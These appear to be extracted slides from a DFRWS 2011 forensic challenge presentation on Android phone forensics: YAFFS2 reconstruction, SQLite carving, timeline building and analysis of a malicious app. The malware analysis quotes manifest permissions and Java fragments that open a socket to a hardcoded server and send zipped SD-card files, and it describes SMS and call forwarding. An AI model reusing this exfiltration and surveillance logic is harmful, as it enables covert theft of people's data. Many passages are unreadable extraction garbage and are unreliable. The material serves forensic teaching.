Titel Spreker Turning Android inside out - SANS Computer Forensics

knapsackyarnMobile - sans fil

14 déc. 2013 (il y a 3 années et 10 mois)

114 vue(s)

Titel

Spreker
Turning Android inside out


DFRWS 2011 Challenge

Ivo Pooters
Fox-IT
pooters@fox-it.com
Case description


Android phone 1:


Donald Norby


Dead


What happened?


Android phone 2:


Yob Taog


Data breach at SwiftLogic: IP leaked


Guilty?
Data acquisition


SD card: regular imaging tools


NAND contains multiple partitions:


MTD mounted on /data


MTD mounted on /cache


Case 1: Root + DD used


No OOB content!
!



Case 2: Root + Nanddump used


Cross-compile for ARM
The low hanging fruit
Norby’s data


9 PDF files in
sdcard/download
folder


The PDF files contain schematics of
SwiftLogic


From cache: carved HTML pages of Taog’s
social media pages and google searches


The cases are linked!
A relevant HTML file
On norby’s phone in cache
partition
Nice, an IP-address
Protected by htaccess
!

Dir listing page of Apache
Hm
!
origin of the
9 PDF files?
FILE SYSTEM

RECONSTRUCTION

Taog’s phone
!"#$%&'"()*&&+"&,-)".$"/)(0$(1"*"
-)+#$('"2)*(34"5$#6"7%.".4)".$$&2"
'$58."%5')(2.*5'"9:;;<=",1*>)2"
Rebuilding file system


Use mobile forensic toolkit (UFED,XRY)


Use unyaffs2 (
http://code.google.com/p/yaffs2utils
)


Doesn’t work properly on ‘real’ images


Use Android emulator


Extract files using adb


Rebuild Linux kernel with YAFFS2 support
YAFFS2 in linux
1.

Clean Ubuntu installation
2.

Get YAFFS2 source repository
(
http://www.aleph1.co.uk/gitweb?p=yaffs2.git;a=summary
)
3.

Patch it into the kernel
4.

Use NANDsim to simulate NAND device
5.

Use NANDwrite to write image to device


Don’t forget –r switch for OOB bytes


Nandwrite –a –r /dev/mtdX ~/DFRWS/mtdX.dd

And presto
Mount /dev/mtdblock0 /mnt/case2/data

fox@server1104:/mnt/case2/data$ ls -l
total 27
drwxrwx--x 1 fox fox 2048 2011-05-05 04:06 anr
drwxrwx--x 1 fox fox 2048 2011-05-08 05:09 app
drwxrwx--x 1 fox fox 2048 1970-01-01 01:02 app-private
drwx------ 1 fox fox 2048 1970-01-01 01:02 backup
-rw-rw-rw- 1 root root 8 2011-05-11 02:45 cc_data
drwxrwx--x 1 fox fox 2048 2011-05-08 05:09 dalvik-cache
drwxrwx--x 1 fox fox 2048 2011-05-08 05:09 data
drwxr-x--- 1 root 1007 2048 1970-01-01 01:02 dontpanic
drwxrwx--x 1 2000 2000 2048 1970-01-01 01:02 local
drwxrwx--- 1 root root 2048 1970-01-01 01:02 lost+found
drwxrwx--t 1 fox 9998 2048 2011-05-11 02:45 misc
drwx------ 1 root root 2048 2011-05-10 22:43 property
drwxrwxr-x 1 fox fox 2048 2011-05-11 02:42 system
drwxr-xr-x 1 fox fox 2048 2011-05-07 18:50 tombstones
UID=1000, GID=1000
A suspicious application


Perform keyword search


Phone numbers, names, other relevant terms


Hit on IP-address 50.56.29.109


/data/dalvik-cache/
data@app@com.andriod.mm.apk@classes.dex
Hmm
!

MALWARE
ANALYSIS

Taog’s phone
?4*.
",2"
.4*.
"
!@A*''()22
"
'$,5>
",5"
.4,2
"
*//&,3*B$5
CC"
Com.andriod.mm


Not in the Android market


data/system/packages.xml


Installed on the evening that phone is bought


Retrieve the APK for reverse engineering:
Data/apps/com.andriod.mm


unzip it!


Convert dex (bytecode) to regular jar


dex2jar
Analysis of androidManifest.xml
<uses-sdk android:minSdkVersion="3" android:targetSdkVersion="4" />
<uses-permission android:name="android.permission.INTERNET" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission
android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
<uses-permission
android:name="android.permission.PROCESS_OUTGOING_CALLS" />
[
!
]
<receiver [
!
] android:name="com.andriod.mm.bootComp">
<intent-filter>
<action android:name="android.intent.action.AIRPLANE_MODE_CHANGED" />
<action android:name="android.intent.action.BOOT_COMPLETED" />
<action android:name="android.intent.action.SCREEN_OFF" />
</intent-filter>
</receiver>
[
!
]

D2)
"
:@E.$$&2
"F
3$')G>$$>&)G3$1
H/H
*5'($,'A*/-.$$&
HI""
Permissions
Triggers
Analysis of java code
[…]
private static final String DEFAULTHOST = "50.56.29.109";
private static final int DEFAULTPORT = 10001;
[…]

int sendFile(String s){

[…]

socket =
SocketFactory.getDefault().createSocket("50.56.29.109", 10001);

outputstream = socket.getOutputStream();

outputstream1.write(abyte2, k1, l1);

[…]
D2)
"
J'>%,
"
0$(
"
')3$1/,&*B$5
"F
K*L*G')3$1/,&)(G0())G0(
HCMN
K'>%,
I"
"
Apparently files are sent to this server
Analysis of java code (2)


Secretly steals sd data:


On trigger, sd-card is scanned for files


Files zipped and sent to

50.56.29.109: 10001


SMS “pkg uploaded”


Monitor calls


SMS
“Callin” + number + date/time



Monitors received text messages and
forwards


SMS
“FORWARDED SMS from” + originating address
+ “ at” + date/time + “: ksms” + message
CARVING
SQLITE

RECORDS
Norby’s phone
O$#6"&).82")P*1,5)"O$(7+82"/4$5)"
Q)*')(
"
R*.*"
S"
R*.*"
S"
Q)*')(
"
R*.*"
="
About YAFFS2
Out of band bytes
R*.*"
S"
Q)*')(
"
High
fragmentation

Challenge


The user data and cache partition are
YAFFS2 formatted.


Remember, we don’t have the OOB bytes


File reconstruction is very difficult at least


Regular carving tools perform poorly


But we really want those sqlite records
SQLite format
T$$."/*>)"
!5.)(,$(
"/*>)"
!5.)(,$(
"/*>)"
!5.)(,$(
"/*>)"
U)*0
"/*>)"
U)*0
"/*>)"
U)*0
"/*>)"
U)*0
"/*>)"
U)*0
"/*>)"
U)*0
"/*>)"
@*>)"
4)*')(
"
V)&&
"/$,5.)("
*((*+
"
V)&&
"3$5.)5."
*()*
"
D5*&&$3*.)'
"
*()*
"
offset
Data records
here!
Schema and SQLite
signature stored here!
Pages not
fragmented
The idea
1.

Identify SQLite pages from raw YAFFS2
image by page signature
2.

Parse out the records using the cell
pointer array.
3.

Match the anonymous records against
predefined templates.


Analyze important SQLite databases for table
format
Results (Contacts)
,'"
5%17)(
"
'*.)HB1)"F%.3I"
'%(*B$5"
.+/)"
5*1)"
S"
WWXY=ZW[Z\"
]^H]WH=]SS"SS_XS_]\"@`"
XWS"
a%."
`("b"
="
WS=WZ=X\]="
]^H]^H=]SS"S=_]W_]S":`"
YS"
a%."
X"
WWXY=ZW[Z\"
]^H]^H=]SS"S=_X\_S[":`"
SS^"
a%."
`("b"
W"
WS=WZ=X\]="
]^H]^H=]SS"]X_S\_XX"@`"
\W"
a%."
^"
WWXY=ZW[Z\"
]^H]\H=]SS"]Z_WZ_=W"@`"
X\S"
!5"
`(
"b"
!'"
',2/&*+"5*1)"
)P.(*",50$"
S"
`("b"


1()c4%241*,&G3$1""


WWXAY=ZAW[Z\"


`(
"b"
="
d*$>"


d*$>
"
d*$>
"


WS=WXYXX\\""
X"
1(
")"


WWXY=ZW[Z\""


1(
"




Results (SMS)
S^W"
WS=WXYXX\\"
]^H]\H=]SS"]W_S=_SZ":`"
S"
,5"
-212Le#212
_HH1)22*>)H
/->
"
%/&$*')'
f"
S^W"
WS=WXYXX\\"
]^H]\H=]SS"]W_S=_SZ":`"
]"
,5"
-212Le#212_HH1)22*>)H/->"%/&$*')'f"
S^^"
]^H]\H=]SS"]W_SX_W\":`"
S"
'(*g"
h$."2$1).4,5>"0$("+$%6"2*1/&)"24$(.&+"
S^^"
]^H]\H=]SS"]^_XS_=\"@`"
S"
'(*g"
h$."2$1).4,5>"0$("+$%6"2*1/&)"24$(.&+"
S^^"
WWXY=ZW[Z\"
]^H]\H=]SS"]Z_]^_XW"@`"
S"
/)5',5>"
h$."2$1)"()2%&.26"!".4,5-"#)"5))'".$"%/".4)"0))6"2*+"'$%7&)C"
S^^"
WWXY=ZW[Z\"
]^H]\H=]SS"]Z_]^_XW"@`"
S"
$%."
h$."2$1)"()2%&.26"!".4,5-"#)"5))'".$"%/".4)"0))6"2*+"'$%7&)C"
S^Z"
WWXY=ZW[Z\"
]^H]\H=]SS"]Z_SZ_SW"@`"
]"
,5"
9$%"*()"K$-,5>6"(,>4.C"9$%"3*5i."2)(,$%2&+".4,5-"*7$%."34*5>,5>".4)"
')*&"5$#G"
S^Z"
WWXY=ZW[Z\"
]^H]\H=]SS"]Z_SZ_SW"@`"
S"
,5"
9$%"*()"K$-,5>6"(,>4.C"9$%"3*5i."2)(,$%2&+".4,5-"*7$%."34*5>,5>".4)"
')*&"5$#G"
S^["
WWXY=ZW[Z\"
]^H]\H=]SS"]Z_==_XY"@`"
S"
/)5',5>"
!"K%2."2)5."+$%"*"2*1/&)6"!".4,5-"+$%i&&"7)"/&)*2)'GGG"
S^["
WWXY=ZW[Z\"
]^H]\H=]SS"]Z_==_XY"@`"
S"
$%."
!"K%2."2)5."+$%"*"2*1/&)6"!".4,5-"+$%i&&"7)"/&)*2)'GGG"
S^\"
WWXY=ZW[Z\"
]^H]\H=]SS"]Z_X]_SX"@`"
]"
,5"
9$%"*()"2)(,$%2".4)5G"!"3*5"2))".4)",50$(1*B$5",2"L*&%*7&)"7%."!"*1"
',2/&)*2)'"#,.4"+$%"7()*-,5>".4)"')*&G"
S^\"
WWXY=ZW[Z\"
]^H]\H=]SS"]Z_X]_SX"@`"
S"
,5"
9$%"*()"2)(,$%2".4)5G"!"3*5"2))".4)",50$(1*B$5",2"L*&%*7&)"7%."!"*1"
',2/&)*2)'"#,.4"+$%"7()*-,5>".4)"')*&G"
S^Y"
WWXY=ZW[Z\"
]^H]\H=]SS"]Z_^Z_WW"@`"
S"
/)5',5>"
!"-5)#"+$%i'"&,-)".4)16",&&"7)"*.".4)"*>())'"2/$.6",5"*7$%."=^"1,5"0$("
.4)")P34*5>)"
S^Y"
WWXY=ZW[Z\"
]^H]\H=]SS"]Z_^Z_WW"@`"
S"
$%."
!"-5)#"+$%i'"&,-)".4)16",&&"7)"*.".4)"*>())'"2/$.6",5"*7$%."=^"1,5"0$("
.4)")P34*5>)"
Results (Browser)
,'
"
4$2."
%2)(5*1)"
/*22#$('"
S"
^]G^ZG=YGS]Y"
5$(7+"
***222//
"


!'
"
R*.)HB1)"
d,.&)
"
DTU"
j,2,.2
"
XW"
]^H]ZH=]SS"]Z_=[_XZ"@`"
+$7
k
.*$>
"A"
d#,l)(
"<)*(34"
4l/_HH2)*(34G.#,l)(G3$1H2)*(34CMN+$7k.*$>"
S"
XW"
]^H]ZH=]SS"]Z_=[_XZ"@`"
4l/_HH2)*(34G.#,l)(G3$1H2)*(34CMN+$7k.*$>"
S"
X^"
]^H]ZH=]SS"]Z_=[_W["@`"
4l/_HH1G.#,l)(G3$1H+$7k.*$>"
S"
XZ"
]^H]ZH=]SS"]Z_=[_W["@`"
d#,l)(
"
4l/_HH1$7,&)G.#,l)(G3$1H+$7k.*$>"
S"
XZ"
]^H]ZH=]SS"]Z_=[_W["@`"
4l/_HH1$7,&)G.#,l)(G3$1H+$7k.*$>"
S"
X["
]^H]ZH=]SS"]Z_=\_]Y"@`"
d#,./,3
"A"<4*()"/4$.$2"*5'"L,')$2"$5"d#,l)("
4l/_HH.#,./,3G3$1HW.230Z"
S"
X["
]^H]ZH=]SS"]Z_=\_]Y"@`"
4l/_HH.#,./,3G3$1HW.230Z"
S"
X\"
]^H]ZH=]SS"]Z_=\_=Z"@`"
d#,./,3"A"<4*()"/4$.$2"*5'"L,')$2"$5"d#,l)("
4l/_HH.#,./,3G3$1HW.L13%"
S"
X\"
]^H]ZH=]SS"]Z_=\_=Z"@`"
4l/_HH.#,./,3G3$1HW.L13%"
S"
SZ"
]^H]\H=]SS"]^_^\_XW"@`"
4l/_HH###G>$$>&)G3$1H1C2$%(3)N*5'($,'A
4$1)"
X"
XY"
]^H]\H=]SS"]^_^Y_=\"@`"
4l/_HH^]G^ZG=YGS]YH22H"
S"
XY"
]^H]\H=]SS"]^_^Y_=\"@`"
!5')P"$0"H22"
4l/_HH^]G^ZG=YGS]YH22H"
S"
XY"
]^H]\H=]SS"]Z_=\_]^"@`"
!5')P"$0"H22"
4l/_HH^]G^ZG=YGS]YH22H"
="
CONNECTING
THE
DOTS

Conclusion

Creating the time line


Normalized all times to UTC time


Determine the timezone of each source


Analyst’s Notebook for timeline
Timeline
Timeline
Timeline
Conclusions/Reconstruction


Taog is victim of an attack


Malware installed on his device at phone
shop before purchase


The schematics of SwiftLogic were secretly
uploaded to the webportal


Norby downloaded the schematics


Norby tries to get more out of the deal


…and get’s killed by mr E